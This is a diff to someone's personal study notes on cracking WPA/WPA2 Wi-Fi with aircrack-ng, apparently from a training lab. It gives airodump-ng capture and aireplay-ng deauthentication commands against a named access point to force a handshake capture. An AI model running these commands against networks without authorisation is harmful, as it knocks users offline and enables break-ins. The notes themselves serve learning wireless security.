allenjedb/allenxd.github.io/content/notes.md

 ### Aircrack-ng

-[Nice Tut](https://www.aircrack-ng.org/doku.php?id=cracking_wpa)
+Can crack WEP and WPA/WPA2 networks that use pre-shared keys or PMKID [Nice Tut](https://www.aircrack-ng.org/doku.php?id=cracking_wpa)

 - Put wlan0 to monitor mode
 - `sudo airodump-ng wlan0mon` dump all wireless
 - List down details of our target BSSID(Mac address of AP), Station(Client connected Mac address), AUTH(PSK)
-- aircrack-ng does not work with Enterprise(MGT), Opportunistic Wireless Encryption(OWE) cannot be cracked yet.
+- Look for AUTH column, should be PSK. aircrack-ng does not work with Enterprise(MGT), Opportunistic Wireless Encryption(OWE) cannot be cracked yet.
 - use airodump again against the specific AP target `sudo airodump-ng -c 3 -w wpa --essid wifu --bssid 34:08:04:09:3D:38 wlan0mon` this will save the result to wpa.cap
 - Aireplay to deauth the client and capture 4-way Handshake `sudo aireplay-ng -0 1 -a 34:08:04:09:3D:38 -c 00:18:4D:1D:A8:1F wlan0mon` The `-0 1` means Deauth once.
 - Once client reconnects we will be able to capture a handshake